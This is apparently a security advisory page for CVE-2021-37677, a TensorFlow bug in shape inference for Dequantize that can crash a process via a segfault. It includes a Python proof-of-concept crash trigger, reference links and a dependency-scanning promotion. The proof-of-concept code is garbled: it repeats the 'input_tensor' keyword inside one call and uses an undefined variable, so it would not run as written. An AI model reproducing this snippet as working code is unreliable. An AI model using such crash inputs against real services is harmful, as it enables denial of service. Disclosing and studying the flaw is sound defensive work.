CVE-2021-37677: Missing validation in shape inference for `Dequantize`
(updated )
The shape inference code for tf.raw_ops.Dequantize
has a vulnerability that could trigger a denial of service via a segfault if an attacker provides invalid arguments:
import tensorflow as tf
tf.compat.v1.disable_v2_behavior()
tf.raw_ops.Dequantize(
input_tensor = tf.constant(-10.0, dtype=tf.float32),
input_tensor = tf.cast(input_tensor, dtype=tf.quint8),
min_range = tf.constant([], shape=[0], dtype=tf.float32),
max_range = tf.constant([], shape=[0], dtype=tf.float32),
mode = 'MIN_COMBINED',
narrow_range=False,
axis=-10,
dtype=tf.dtypes.float32)
References
- github.com/advisories/GHSA-qfpc-5pjr-mh26
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-590.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-788.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-299.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/da857cfa0fde8f79ad0afdbc94e88b5d4bbec764
- github.com/tensorflow/tensorflow/security/advisories/GHSA-qfpc-5pjr-mh26
- nvd.nist.gov/vuln/detail/CVE-2021-37677
Detect and mitigate CVE-2021-37677 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →